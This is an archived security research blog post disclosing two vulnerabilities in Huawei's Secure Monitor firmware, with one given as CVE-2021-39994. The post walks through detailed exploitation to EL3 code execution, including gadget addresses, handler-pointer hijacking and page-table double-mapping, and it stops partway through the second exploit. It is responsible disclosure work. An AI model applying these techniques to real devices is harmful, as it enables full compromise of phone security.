⚠️ [ ORIGIN SOURCE ]

https://blog.impalabs.com/2212_advisory_huawei-secure-monitor.html

📅 [ Archival Date ]

Dec 15, 2022 6:58 PM

🏷️ [ Tags ]

AndroidHuaweiATFSecure Monitor

✍️ [ Author ]

Alexandre Adamski, Maxime Peterlin

In a previous blog post about the internals of Huawei's security hypervisor, we detailed the motivations of Android vendors for introducing new technologies to enhance the security of their devices. We explained that security hypervisors can watch over the Android kernel by leveraging the virtualization extensions of the ARMv8-A architecture. In particular, these extensions introduce EL2, an exception level more privileged than the kernel at EL1, and userland at EL0.

The ARM TrustZone is another one of these security features. It consists of a system-wide and hardware-enforced separation. All software and hardware is partitioned into an untrusted Normal World, and a trusted Secure World. Since non-secure software is prohibited from accessing secure resources, all communications between the two worlds need to go through a dedicated component, the Secure Monitor, that can be called into using the Secure Monitor Call (SMC) instruction.

The Secure Monitor runs at EL3, the new highest privilege level introduced with TrustZone. It has complete control over the device and is the only component allowed to perform certain privileged operations, in particular:

it manages critical peripherals, such as the cryptographic engine, the electronic fuses, and the RPMB partition;
it acts as a bridge between the normal and secure worlds, where it forwards requests between the Android kernel and the trusted OS.

Similarly to Samsung, Huawei chose to base their Secure Monitor implementation on the ARM Trusted Firmware (ATF), an open source reference implementation provided by ARM. Third-party features can be easily integrated into ATF through its EL3 runtime services framework, which was used by Huawei to implement additional groups of SMC handlers. During our security assessment, we focused primarily on these custom SMC handlers, as they have been under less scrutiny than their open source counterparts.

While we could have dwelled on the subject of runtime services, the explanations given by Fernand Lone Sang in his "Reverse Engineering Samsung S6 SBOOT" blog post are still relevant. We invite the reader to read the Service Descriptors section of part I and the Runtime services initialization section of part II.

The rest of this article describes two vulnerabilities we found in Huawei's Secure Monitor implementation.

SMC SE Factory Check OOB Access

Vulnerability Details

The Secure Element (SE), called HISEE, is a critical peripheral of Hisilicon-equipped devices. As such, it is only made accessible to the secure world, so the secure monitor needs to act as some kind of passthrough to let the kernel interact with it.

On the kernel side, most of the communications are performed by the "hisee" driver found in drivers/hisi/hisee/hisee.c using the HISEE_FN_MAIN_SERVICE_CMD SMC (0xC5000020). This SMC defines multiple commands, which correspond to the se_smc_cmd enumeration below.

▸ drivers/hisi/hisee/hisee.h

enum se_smc_cmd {
    // ...
    CMD_WRITE_RPMB_KEY,
    CMD_SET_LCS_SM,
    CMD_SET_STATE,
    CMD_GET_STATE,
    CMD_APDU_RAWDATA,
    CMD_FACTORY_APDU_TEST,
    CMD_HISEE_CHANNEL_TEST,
    CMD_HISEE_VERIFY_KEY,
    CMD_HISEE_WRITE_CASD_KEY,
    // ...
};

These commands are sent to the secure monitor using the send_smc_process function.

▸ drivers/hisi/hisee/hisee.c

int send_smc_process(const struct atf_message_header *p_message_header,
             phys_addr_t phy_addr, unsigned int size,
             unsigned int timeout, enum se_smc_cmd smc_cmd)
{
    // ...
    ret = atfd_hisee_smc((u64)HISEE_FN_MAIN_SERVICE_CMD,
                     (u64)smc_cmd, (u64)phy_addr, (u64)size);
    // ...
}

As an example, let's see how raw APDU commands are sent by the kernel using the write_apdu_command_func function. If the shared memory buffer of size 4096 bytes hasn't been allocated yet, this function allocates it by calling dma_alloc_coherent. It then sets the fields of the 16-byte atf_message_header structure located at the beginning of this shared buffer and finally copies the APDU command bytes right after it.

▸ drivers/hisi/hisee/hisee.c

static int write_apdu_command_func(const char *apdu_buf, unsigned int apdu_len)
{
    // ...
    if (!hisee_data_ptr->apdu_command_buff_virt)
        hisee_data_ptr->apdu_command_buff_virt =
            (void *)dma_alloc_coherent(hisee_data_ptr->cma_device,
                           SIZE_4K,
                           &hisee_data_ptr->apdu_command_buff_phy,
                           GFP_KERNEL);
    // ...
    p_message_header = (struct atf_message_header *)(uintptr_t)hisee_data_ptr->apdu_command_buff_virt;
set_message_header(p_message_header, CMD_APDU_RAWDATA);
    // ...
    apdu_len = (apdu_len > HISEE_APDU_DATA_LEN_MAX) ?
           HISEE_APDU_DATA_LEN_MAX : apdu_len;
    ret =memcpy_s(hisee_data_ptr->apdu_command_buff_virt + HISEE_ATF_MESSAGE_HEADER_LEN,
               SIZE_4K - HISEE_ATF_MESSAGE_HEADER_LEN,
               (void *)apdu_buf, (size_t)apdu_len);
    // ...
    image_size = HISEE_ATF_MESSAGE_HEADER_LEN + apdu_len;
    p_message_header->test_result_phy =
        (u32)(hisee_data_ptr->apdu_command_buff_phy + SIZE_2K);
    p_message_header->test_result_size = (unsigned int)SIZE_1K;
    ret =send_smc_process(p_message_header,
                   hisee_data_ptr->apdu_command_buff_phy, image_size,
                   HISEE_ATF_GENERAL_TIMEOUT, CMD_APDU_RAWDATA);
    // ...
    ret =memcpy_s(hisee_data_ptr->apdu_ack.ack_buf,
               HISEE_APDU_DATA_LEN_MAX + 1,
               (hisee_data_ptr->apdu_command_buff_virt + SIZE_2K),
               (size_t)p_message_header->test_result_size);
    // ...
    hisee_data_ptr->apdu_ack.ack_len = p_message_header->test_result_size;
    // ...
}

The header structure atf_message_header contains the command of the HISEE_FN_MAIN_SERVICE_CMD SMC, a return code, and the physical address and size of the buffer where the response data should be copied by the secure monitor. In write_apdu_command_func, we can see that the response data, of a maximum of 1024 bytes, should be copied in the shared buffer itself at offset 2048.

▸ drivers/hisi/hisee/hisee.h

/* message header between kernel and atf */
struct atf_message_header {
    /*
     * atf cmd execute type, such as otp, cos, sloader at all,
     * kernel set and atf read it
     */
    unsigned int cmd;
    /*
     * atf cmd execute result indication, use a magic value to
     * indicate success, atf set it and check in kernel
     */
    unsigned int ack;
    /* tell atf store the result to this buffer when doing channel test */
    unsigned int test_result_phy;
    /* tell atf the size of buffer when doing channel test */
    unsigned int test_result_size;
};

On the secure monitor side, the HISEE_FN_MAIN_SERVICE_CMD SMC is handled by the hisee_smc_handler function. If the command uses a shared memory buffer as an argument, like the CMD_APDU_RAWDATA command invoked by write_apdu_command_func, its physical address and size should be checked by the se_smc_addr_check function before it is dispatched to the actual handler.

uintptr_t hisee_smc_handler(
        uint32_t smc_fid,
        uint64_t x1,
        uint64_t x2,
        uint64_t x3,
        uint64_t x4,
        void *cookie,
        void *handle,
        uint64_t flags) {
    // Do the arguments (shared memory buffer address and size) need to be checked?
    if (x1 - 0xb > 0x35 || ((1 << (x1 - 0xb)) & 0x2003e000002041) == 0) {
        // Ensure the shared memory buffer is in the CMA region.
        if (!se_smc_addr_check(x2, x3)) {
            debug_print("\nse smc addr error\n");
            goto ERROR;
        }
        // Ensure it is bigger than the size of the header structure.
        if (x3 < 0x10) {
            debug_print("\nse smc size error\n");
            goto ERROR;
        }
    }
    // Find the corresponding command handler and call it.
    for (i = 0; i != 25; ++i) {
        if (x1 == se_smc_cmd_handlers[i].cmd) {
            handler_t handler = se_smc_cmd_handlers[i].handler;
            if (handler)
                return handler(x1, x2, x3, handle);
        }
    }
    debug_print("\n%s: unknown cmd %x\n", "hisee_smc_handler", x1);
}

The se_smc_addr_check function ensures the shared memory buffer is located, in its entirety, in the CMA region (0x40000000-0x50000000). As we have just seen, it is called from hisee_smc_handler, but it can also be called directly from the SMC handlers when needed.

uint64_t se_smc_addr_check(uint64_t addr, uint64_t size) {
    // Retrieve (once) the CMA region base address and size.
    if (!cma_info_read) {
        if (get_cma_info(&g_cma_addr, &g_cma_size)) {
            debug_print("\nget cma info fail\n\r");
            return 0;
        }
        cma_info_read = 1;
    }

    // Ensure address and address+size are within this region.
    if (g_cma_addr <= addr && addr <= addr + size)
        return addr + size <= g_cma_addr + g_cma_size;
    return 0;
}

The list of commands for which the arguments are not checked and thus should not be used is as follows:

ID	Name
0x0B	`CMD_GET_STATE`
0x11	`CMD_HISEE_FACTORY_CHECK`
0x18	-
0x30	`CMD_HISEE_POWER_ON`
0x31	`CMD_HISEE_POWER_OFF`
0x32	`CMD_SMX_PROCESS_STEP1`
0x33	`CMD_SMX_PROCESS_STEP2`
0x34	`CMD_SMX_GET_EFUSE`
0x40	`CMD_HISEE_GET_EFUSE_VALUE`

However, when looking at se_factory_check, the command handler for CMD_HISEE_FACTORY_CHECK, we noticed that it uses its arguments. This is evidenced by the shared memory buffer address and size being given to the set_message_header function.

uintptr_t se_factory_check(uint64_t cmd, uint64_t addr, uint64_t size, void *handle) {
    int32_t ret;
    char request[32];

    if (addr) {
        memset_s(request, sizeof(request), 0, sizeof(request));
set_message_header(addr, size);
        *(uint32_t *)(request + 0x00) = 0xd7;
        *(uint32_t *)(request + 0x04) = 0;
        *(uint32_t *)(request + 0x08) = 0x13d8;
        *(uint32_t *)(request + 0x0c) = 0;
        *(uint32_t *)(request + 0x10) = 0x13d8;
        *(uint64_t *)(request + 0x18) = 0x1422bbc0;
        ret = se_cmd_mailbox_send(request);
    }
    // ...
}

set_message_header saves the address and size of the shared memory buffer into global variables that will be used later.

void set_message_header(uint64_t addr, uint64_t size) {
    g_msg_hdr_addr = addr;
    g_msg_hdr_size = size;
}

Because of the missing call to se_smc_addr_check for CMD_HISEE_FACTORY_CHECK, the kernel can pass addr and size values so that the shared buffer is outside of the CMA region. In particular, it can pass addresses that are within the secure monitor's address space.

Now we need to see where these values are used to know what it is possible to do. By looking at the cross references to g_msg_hdr_addr, we found the code path taken when handling the SE's reply to a request. When the SE has handled the request, the secure monitor receives a reply in its mailbox and calls the corresponding handler, which is se_chip_test_ack for CMD_HISEE_FACTORY_CHECK.

se_chip_test_ack then calls send_ack, with the response code and 0xC bytes of response data.

uint64_t se_chip_test_ack(char* reply) {
    uint32_t code;
    uint32_t data[3];

    if (reply) {
        // Copy the response data into a local buffer.
        data[0] = *(uint32_t *)(reply + 0x4);
        data[1] = *(uint32_t *)(reply + 0xc);
        data[2] = *(uint32_t *)(reply + 0x10);
        // Convert the status word into a response code.
        if (reply[1] == 0xa3) {
            code = 0xccaa;
        } else {
            debug_print("\nhisee test result %x %x %x!\n",
                data[0], data[1], data[2]);
            code = 0xcc55;
        }
        // Send the response and its data to the kernel.
send_ack(code | 0xaabb0000, data, 0xc);
        return 0;
    } else {
        debug_print("\n%s: para error!\n", "se_chip_test_ack");
        return 0xFFFFFFFF;
    }
}

send_ack does the following:

it sets the ack field of the header to the response code;
it sets its test_result_size field to MIN(g_msg_hdr_size, data_size);
it copies the response data (if any) to test_result_phy, provided that the kernel-provided buffer passes se_smc_addr_check.

void send_ack(uint32_t code, uint64_t data_addr, uint32_t data_size)
{
    uin32_t resp_buf;
    uin32_t resp_buf_len;

    // Get the shared memory buffer saved in g_msg_hdr_addr.
    message_header = (struct atf_message_header*)g_msg_hdr_addr;
    if (g_msg_hdr_addr) {
        // Set the return code.
        message_header->ack = code;
        // Get the response buffer's address and size.
        resp_buf = message_header->test_result_phy;
        resp_buf_len = MIN(g_msg_hdr_size, data_size);
        message_header->test_result_size = resp_buf_len;
        // If there is any response data, copy it to the response buffer if the check of se_smc_addr_check passes.
        if (data_addr && resp_buf &&se_smc_addr_check(resp_buf, resp_buf_len)
                &&memcpy_s(resp_buf, resp_buf_len, data_addr, resp_buf_len)) {
            debug_print("\n%s: memcpy err\n", "send_ack");
        } else {
            arm_gic_raise_softirq(8);
        }
    } else {
        debug_print("\n%s: null pointer err\n", "send_ack");
    }
}

So if we set g_msg_hdr_addr to an address X within the secure monitor's address space, it will write code (0xAABBCC55) at X+0x4 and data_size (a value always between 0x0 and 0xC in the calling functions) at X+0xC.

We'll see in the exploitation section how this bug can be used to craft an exploit achieving reliable code execution in EL3 from NS-EL1.

Exploitation

In this section, we will describe the exploit and the different primitives we constructed to get arbitrary code execution in EL3 from the kernel.

Disabling the CMA Whitelist

The first step of the exploit is to disable the CMA whitelist so that the calls to se_smc_addr_check always return true. This way, in send_ack, we will be able to reach the call to memcpy_s with a controlled destination address.

We do that by triggering the vulnerability twice, once to change g_cma_addr to 0xC (using the data_size value) and a second time to change g_cma_size to 0xAABBCC55 (using the code value). This will transform the allowed address range from 0x40000000-0x50000000 to 0xC-0xAABBCC61, making it possible to use addresses in the secure monitor's address space as destinations for memcpy_s.

Hijacking an SMC Handler Pointer

By using CMD_HISEE_FACTORY_CHECK a third time, the response data coming from the SE will be copied to the destination address of our choice:

7c 02 10 0b 57 57 57 13 b6 01 00 00

Furthermore, it is possible to make memcpy_s copy less than 0xC bytes by setting g_msg_hdr_size to a smaller value than data_size. Please note that it is not possible to do that directly with the command arguments because of the size < 0x10 check in hisee_smc_handler. In our exploit, we set g_msg_hdr_size to 1, so that only the first byte (0x7c) gets written at our arbitrary location.

This primitive is then used to hijack one of the many function pointers present in the data section to get control of the secure monitor's execution flow. The idea is to find a function pointer that is easily reachable from an SMC and that will point to an interesting gadget once we change its value. This is highly dependent on the secure monitor's version. For reference, on our test device it was v1.5(debug):ab5a980.

We chose to modify one of the SMC handler pointers of the bl31_secap_svc runtime service.

ops_t bl31_secap_smc_handlers[] = {
    /* 0x14230238: */ {0xca000001, func_14204a1c},
    /* 0x14230248: */ {0xca000002, func_14204a14},
    /* 0x14230258: */ {0xca000008, func_14205144},
};

The SMC handler pointer we targeted is located at address 0x14230238 and points to the function at 0x14204A1C. The reason we chose this one in particular is that there is an interesting BLR X2 gadget at 0x14204A7C that lets us call an arbitrary function:

0x14204a7c:  ldr  x2, [x2,#0xb8]
0x14204a80:  cbnz x2, loc_14204aa0
...
0x14204aa0:  blr  x2

Note: The value we will branch to comes from dereferencing X2+0xB8, so we will need to have X2 pointing to some memory that is readable from the secure monitor and preferably, that we can control from the kernel. For example, we can reuse the shared memory buffer for this.

Let's now detail how we can leverage this gadget to build better primitives.

The function pointer we hijacked is used in bl31_secap_handler (0x14205150), which is just a wrapper for the SMC handlers in bl31_secap_smc_handlers. The arguments passed from NS-EL1, except for smc_fid, will be moved into X0-X3 at the call site.

0x14205264:  mov x2, x3
0x14205268:  mov x0, x22
0x1420526c:  mov x1, x21
0x14205270:  mov x3, x4
0x14205274:  blr x6        /* address of the blr x2 gadget */

Looking at the assembly calling the handler (now our BLR X2 gadget), we can see that we control the following registers:

X0 == X22
X1 == X21
X2
X3 == X4

X2 must contain the address of memory containing at offset 0xB8, the address of the second gadget we will jump to after calling the BLR X2 gadget. Now we just need to find an interesting gadget that uses any of the other registers we control to enhance our current primitives.

We'll start by finding an arbitrary write gadget.

Temporary Write Primitive

In a code base as large as the monitor, it's not too hard to find a gadget that writes a value from a register to an address. However, we need to take into account the fact that the branch at the call site of the original SMC handler is a BLR instruction, which means we will lose the original return address in the LR register. Nonetheless, we can retrieve the return address stored in the bl31_secap_handler's stack frame by finding a gadget with the same epilogue (or at least the same stack frame size). This way, we can return cleanly to the runtime service dispatcher.

The epilogue of bl31_secap_handler below adds 0x50 bytes to the stack before returning:

0x1420528c:  ldp x19, x20, [sp,#0x10]
0x14205290:  ldp x21, x22, [sp,#0x20]
0x14205294:  ldp x29, x30, [sp],#0x50
0x14205298:  ret

The arbitrary write gadget we're using, found at address 0x1420CF88, does the same thing and will therefore return properly:

0x1420cf88:  str   w1, [x0]
0x1420cf8c:  csinc w0, w21, wzr, ne
0x1420cf90:  ldp   x19, x20, [sp,#0x10]
0x1420cf94:  ldp   x21, x22, [sp,#0x20]
0x1420cf98:  ldp   x23, x24, [sp,#0x30]
0x1420cf9c:  ldp   x29, x30, [sp],#0x50
0x1420cfa0:  ret

At this stage, once we have replaced the SMC handler pointer with the address of our BLR X2 gadget, we can now call the corresponding SMC from the kernel with the following arguments and start using our arbitrary write:

X0: the hijacked SMC ID (0xCA000001);
X1: the address we want to write to;
X2: the value we want to write;
X3: a buffer containing the address of the arbitrary write gadget.

Stable Read/Write Primitives

The next step of the exploit is to get better read/write primitives by modifying, yet again, the SMC handler pointers of bl31_secap_svc.

The handler pointer for SMC 0xCA000001 (at address 0x14230238) is changed to 0x14205E74, which is an arbitrary write gadget:

0x14205e74:  str x0, [x1]
0x14205e78:  ret

The handler pointer for SMC 0xCA000002 (at address 0x14230248) is changed to 0x142013F4, which is an arbitrary read gadget:

0x142013f4:  ldr w0, [x0,x1]
0x142013f8:  ret

At this stage, we have stable read/write primitives, and we can now start working towards arbitrary code execution.

Double Mapping the Secure Monitor

To get code execution in the secure monitor, our objective is to patch the code of an SMC handler. However, since the code section is mapped as read-only, we cannot do that directly. To bypass the WXN mechanism, we decided to target the page table and map the secure monitor a second time, as read-write. This way, we are able to change the secure monitor's code from the writable mapping and have the changes mirrored in the executable one.

The first step of this phase is to find the third-level EL3 page table corresponding to the monitor's code and data sections. We do so by looking for the descriptors of the secure monitor based on the physical addresses that they map (i.e. we know that the monitor's physical address range starts at 0x14200000). A dump of the corresponding descriptors in the page tables is given below.

/* monitor code section */
0x14251000: c3 07 20 14 00 00 00 00 c3 17 20 14 00 00 00 00 .. ....... .....
0x14251010: c3 27 20 14 00 00 00 00 c3 37 20 14 00 00 00 00 .' ......7 .....
0x14251020: c3 47 20 14 00 00 00 00 c3 57 20 14 00 00 00 00 .G ......W .....
[...]
0x14251150: c3 a7 22 14 00 00 00 00 c3 b7 22 14 00 00 00 00 ..".......".....
0x14251160: c3 c7 22 14 00 00 00 00 c3 d7 22 14 00 00 00 00 ..".......".....
0x14251170: c3 e7 22 14 00 00 00 00 c3 f7 22 14 00 00 00 00 ..".......".....

/* monitor data + rodata section */
0x14251180: 43 07 23 14 00 00 40 00 43 17 23 14 00 00 40 00 C.#[email protected].#...@.
0x14251190: 43 27 23 14 00 00 40 00 43 37 23 14 00 00 40 00 C'#[email protected]#...@.
0x142511a0: 43 47 23 14 00 00 40 00 43 57 23 14 00 00 40 00 CG#[email protected]#...@.
[...]
0x14251310: 43 27 26 14 00 00 40 00 43 37 26 14 00 00 40 00 C'&[email protected]&...@.
0x14251320: 43 47 26 14 00 00 40 00 43 57 26 14 00 00 40 00 CG&[email protected]&...@.
0x14251330: 43 67 26 14 00 00 40 00 47 76 26 14 00 00 40 00 Cg&[email protected]&...@.

/* unused descriptors */
0x14251340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x14251350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x14251360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...]
0x142516d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x142516e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x142516f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

As can be seen above, there are multiple unused descriptors right after the monitor's. The double mapping can be achieved by copying the monitor's descriptors to this unused space, changing their AP field to read/write, and setting their PXN flag. This way, we'll have a read-write mapping of the monitor starting from virtual address 0x14268000. We can now patch the monitor code however we like.

Getting Code Execution in EL3

The last thing left to do is modify another SMC handler pointer to execute a shellcode we placed somewhere in memory. In our exploit, we chose to change the last handler pointer (for the SMC 0xCA000008) in bl31_secap_smc_handlers to 0x14200000 and then write our shellcode at the corresponding double-mapped address. At this point, we have everything required to hijack the secure monitor and get code execution at EL3.

Exploitation Summary

Step 0: The initial state where the whitelist is still effective. It prevents the kernel from passing a buffer located outside of the CMA region, except for the vulnerable CMD_HISEE_FACTORY_CHECK command.

Step 1: We trigger the vulnerability twice to set g_cma_addr to 0xC and to set g_cma_size to 0xAABBCC55. This disables the CMA whitelist including for the response data buffer used by send_ack.

Step 2: We can make the memcpy_s call write bytes of the response data to an arbitrary address. We look for a function pointer that can be made to point to an interesting gadget, such as an arbitrary function call.

Step 3: We trigger the vulnerability a third time: the first byte of the response data is written to the LSB of the SMC handler pointer, making it point to our arbitrary call gadget. We look for a temporary write gadget.

Step 4: We put the address of the arbitrary write gadget in memory pointed to by register x2 and invoke the hijacked SMC. This effectively executes the arbitrary call gadget, that calls the arbitrary write gadget.

Step 5: When invoking the hijacked SMC, we set the other registers so that the address of the arbitrary write gadget is written to the SMC handler pointer. The arbitrary write gadget can now be called directly.

Step 6: We invoke the twice-hijacked SMC to write the address of a read gadget to another SMC handler pointer. We now have stable read/write primitives that can be used to get code execution.

Step 7: We use the read primitive to locate the EL3 page tables. In one of the pages, we find the descriptor that maps the virtual address 0x14200000, the base address of the secure monitor.

Step 8: Because of the WXN mechanism, we can't directly make the code section writable. Instead we create a second mapping of the physical memory by copying the descriptors that map the code and data sections.

Step 9: When writing the copy, we change the AP and PXN bits of the descriptors, to make the mapping writable. We can now patch the secure monitor's code using our write primitive and get code execution at EL3.

Affected Devices

We have verified that the vulnerability impacted the following device(s):

Kirin 810: P40 Lite (JNY)

Please note that other models might have been affected.

Patch

This vulnerability was assigned CVE-2021-39994 and patched in the February 2022 security update.

Timeline

Aug. 09, 2021 - A vulnerability report is sent to Huawei PSIRT.
Aug. 26, 2021 - Huawei PSIRT acknowledges the vulnerability report.
Feb. 01, 2022 - The issue is fixed in the February 2022 update.

SMC MNTN OOB Access

Vulnerability Details

In addition to acting as a passthrough for the kernel to send commands to and receive responses from the Secure Element (SE), the secure monitor also offers a way to retrieve the SE's logs. This is done in a similar way to the logging system of the security hypervisor, which uses a shared memory buffer.

On the kernel side, the logs of the SE are managed, among other things, by the "hisee mntn" driver. This driver can be found in drivers/hisi/mntn/hisee/hisee_mntn.c and makes use of the HISEE_MNTN_ID SMC (0xC500CC00) to communicate with the secure monitor. This SMC has four commands defined in the hisee_mntn_smc_cmd enumeration below.

▸ drivers/hisi/mntn/hisee/hisee_mntn.h

typedef enum {
    HISEE_SMC_INIT = 1,
HISEE_SMC_GET_LOG,  /*save all log data when hisee reset*/
    HISEE_SMC_LOG_OUT,      /*get log print of hisee when it is running*/
    HISEE_SMC_GET_VOTE      /*get vote value of hisee pwr state*/
} hisee_mntn_smc_cmd;

The first command, HISEE_SMC_INIT, is used by the kernel to inform the secure monitor of the physical address and size of the shared memory buffer to use. The command is called from the hisee_mntn_probe function, which allocates the shared buffer by calling dma_alloc_coherent.

▸ drivers/hisi/mntn/hisee/hisee_mntn.c

static int hisee_mntn_probe(struct platform_device *pdev)
{
    // ...
    atfd_hisi_service_hisee_mntn_smc(
        (u64)HISEE_MNTN_ID,         /* SMC handler ID */
        (u64)HISEE_SMC_INIT,        /* SMC MNTN Command ID */
        hisee_log_phy,              /* Shared log buffer physical address */
        (u64)hisee_info.log_len);   /* Shared info size */
    // ...
}

The commands HISEE_SMC_GET_LOG and HISEE_SMC_LOG_OUT are used to make the secure monitor write the SE's logs into the shared memory buffer, the first one when the SE is being reset, and the second one when it is executing.

The vulnerable command is HISEE_SMC_INIT. It is handled in the hisee_mntn_smc_handler function, the handler for the HISEE_MNTN_ID SMC.

uint64_t hisee_mntn_smc_handler(
        uint32_t smc_fid,
        uint64_t cmd
        uint64_t buf_addr,
        uint64_t buf_size,
        uint64_t x4,
        void *cookie,
        void *handle,
        uint64_t flags) {
    // ...
    switch (cmd) {
        case HISEE_SMC_INIT:
            // Check (improperly) that the buffer is in the address range 0x3c000000-0x40000000.
            if (buf_addr >= 0x3c000000 && buf_addr + buf_size - 1 < 0x40000000) {
                // Fill the control structure at the beginning of the log buffer.
                header = (hlog_header_t*)buf_addr;
                header->addr = buf_addr + 0x18;
                header->max_size = buf_size - 0x18;
                header->real_size = 0;
                // Save the log buffer physical address in a global variable.
                g_hisee_log_buffer = buf_addr;
            }
            break;
        // ...
        }
    }
    return 0;
}

The vulnerability we identified is twofold. Firstly, the checks performed on the buffer address and size don't account for integer overflows. Secondly, the control structure used by the secure monitor is located in a shared memory region and contains a pointer that can be arbitrarily modified.

Integer Overflow

The first issue lies in the checks performed on the shared memory buffer's address and size. The two conditions to satisfy are:

buf_addr >= 0x3C000000
buf_addr + buf_size <= 0x40000000

However, these checks allow integer overflows. It's possible to provide a buffer address higher than 0x40000000 and then adapt the buffer size to make the addition buf_addr + buf_size overflow. The result will then be smaller than 0x40000000, and the checks will pass.

As an example, we can take the address 0xDEADBEEF and the size 0xFFFFFFFF21524111.

0xDEADBEEF is larger than 0x3C000000, so it passes the first check;
0xDEAD_BEEF + 0xFFFF_FFFF_2152_4111 = 0x0 (on 64-bit platforms), thus passing the second check.

We can then abuse the rest of the function to perform writes at addresses relative to our chosen buffer address, for example, the following 3 statements.

header->addr = buf_addr + 0x18;
header->max_size = buf_size - 0x18;
header->real_size = 0;

Note: There are still restrictions on the values buf_addr/header can take. It can only go from 0x3C000000 to 0xFFFFFFFFFFFFFFFF, which means we cannot write into the secure monitor's memory sections using this integer overflow alone, since it is mapped at address 0x14000000.

Shared Control Structure

The second issue is related to the control structure hlog_header used to keep track of the current position within the shared memory buffer.

typedef struct hlog_header {
    uint64_t addr;
    uint64_t max_size;
    uint64_t real_size;
} hlog_header_t;

This structure is located at the beginning of the shared memory buffer provided by the kernel. The kernel is thus able to modify its fields at any time, including while they are being used by the secure monitor. Most importantly, the field addr, the address where the logs will be written, can be modified by the kernel long after the checks have been performed by hisee_mntn_smc_handler.

We'll see in the next section how these bugs can be combined to craft an exploit that achieves reliable code execution in EL3 from NS-EL1.

Exploitation

In this section, we describe the exploit and the different primitives we constructed to get arbitrary code execution at EL3 from the kernel.

Arbitrary Memset Primitive

The first primitive we crafted allows us to perform a memset of an arbitrary memory range. To do this, we use the command HISEE_SMC_GET_LOG which sets g_hisee_log_buffer->real_size to 0 before calling the hisee_save_log function.

uint64_t hisee_mntn_smc_handler(
        uint32_t smc_fid,
        uint64_t cmd,
        uint64_t buf_addr,
        uint64_t buf_size,
        uint64_t x4,
        void *cookie,
        void *handle,
        uint64_t flags) {
    // ...
    switch (cmd) {
        case HISEE_SMC_GET_LOG:
            if (g_hisee_log_buffer) {
                g_hisee_log_buffer->real_size = 0;
                ret =hisee_save_log(0xf0e23800, 0x7b0);
            }
            break;
        }
        // ...
    }
    return 0;
}

hisee_save_log performs a memcpy_s from 0xF0E23800 to g_hisee_log_buffer->addr + g_hisee_log_buffer->real_size. As we've seen in HISEE_SMC_INIT, g_hisee_log_buffer points to the control structure at the beginning of the shared memory buffer. So by using the second bug, we can make g_hisee_log_buffer->addr (but not g_hisee_log_buffer) point to any address, including the secure monitor's sections.

uint64_t hisee_save_log(uint64_t addr, uint64_t size) {
    // ...
    // Sanity-check on the argument values.
    if (!size || !g_hisee_log_buffer || !get_hisee_state())
        return -1;
    // Copy the logs to the shared memory buffer.
    res =memcpy_s(
        g_hisee_log_buffer->real_size + g_hisee_log_buffer->addr,
        g_hisee_log_buffer->max_size,
        addr,
        size);
    if (res)
        return -1;
    // Increment the current size in the control structure.
    g_hisee_log_buffer->real_size += size;
    return res;
}

An interesting property of memcpy_s is that if any of the checks it does fails, it calls the function reset_memory.

uint64_t memcpy_s(char *dst, uint64_t dst_len, char *src, uint64_t src_len) {
    // Sanity-check on the argument values, and the source and destination buffers.
    if (src_len > dst_len || !dst || !src || dst_len >= 0x80000000 || !src_len
            || (src >= dst || dst < src + src_len) && (dst >= src || src < dst + src_len)) {
        // Call reset_memory to ensure no uninitialized memory from the destination buffer leaks.
        returnreset_memory(dst, dst_len, src, src_len);
    }
    // Call memcpy that does the actual copy.
    memcpy(dst, src, src_len);
    return 0;
}

And reset_memory is a wrapper around calls to memset that reset the destination memory to zero.

uint64_t reset_memory(char *dst, uint64_t dst_len, char *src, uint64_t src_len) {
    // ...
    if (dst_len < 0x80000000) {
        if (dst && src) {
            if (src_len <= dst_len) {
                if (src < dst && dst < src + src_len || dst < src && src < dst + src_len) {
                    memset(dst, 0, dst_len);
                }
            } else {
                memset(dst, 0, dst_len);
            }
        } else {
            if (dst) {
                memset(dst, 0, dst_len);
            }
        }
    }
    // ...
}

By looking at the conditions in memcpy_s and reset_memory, we can see that if we provide a destination length smaller than the source length (i.e. 0x7B0), we can then perform a memset of the destination buffer with any size smaller than 0x7B0.

However, there is still one condition to meet before we can use this primitive, which is passing the first check in hisee_save_log:

if (!size || !g_hisee_log_buffer || !get_hisee_state())
    return -1;

The size and log buffer pointer will be non-zero for this call, but we still need to make sure that get_hisee_state returns a non-zero value. That is the case when the extract_bit_11_from_0xfff0a434 function also returns a non-zero value.

uint64_t get_hisee_state() {
    uint64_t state = 0;
    spin_lock(g_lock);
    if (extract_bit_11_from_0xfff0a434()) {
        state = 1;
        // ...
    }
    spin_unlock(g_lock);
    return state;
}

And this happens when the 11th bit from the quad-word at address 0xFFF0A434 is set.

uint64_t extract_bit_11_from_0xfff0a434() {
    return ((*(uint64_t*)0xfff0a434) >> 11) & 1;
}

To make sure that this bit is set, we can use the first bug affecting the command HISEE_SMC_INIT (the integer overflow) to write 1 << 11 = 0x800 at address 0xFFF0A434 (which is greater than 0x3C000000). When specifying buffer address X to this command, the following values are written:

Field	Offset	Possible Values
`addr`	`0x00`	`X + 0x18`
`max_size`	`0x08`	From `-(X + 0x18)` to `-(X + 0x18) + 0x40000000`
`real_size`	`0x10`	`0`

We can fully control the 3 least significant bytes of the field max_size by adjusting the buffer size given to the command. This is enough to fill the condition at the beginning of hisee_save_log and start working towards crafting read/write primitives.

Arbitrary Read-Write Primitives

Control-Flow Hijacking

The next step of the exploit is to craft arbitrary read/write primitives using our memset primitive. We can do this by changing one of the many function pointers present in the data section to hijack the monitor's secure execution flow.

The idea is to find a function pointer that is easily reachable from an SMC and that will point to an interesting gadget once we set one or more of its bytes to zero. This is highly dependent on the secure monitor version. On our test device, the version was v1.5(debug):6458010.

We chose to modify one of the SMC handler pointers of the bl31_secap_svc runtime service.

ops_t bl31_secap_smc_handlers[] = {
    /* 0x14028178: */ {0xca000001, func_14003148},
    /* 0x14028188: */ {0xca000002, func_14003140},
    /* 0x14028198: */ {0xca000008, func_1400382c},
};

The SMC handler pointer we targeted is located at address 0x140281A0 and points to the function at 0x1400382C. The reason we chose this one in particular is because there is an interesting BLR X2 gadget at 0x14003800 that lets us call an arbitrary function:

0x14003800: cbnz x2, 0x14003820
[...]
0x14003820: blr x2

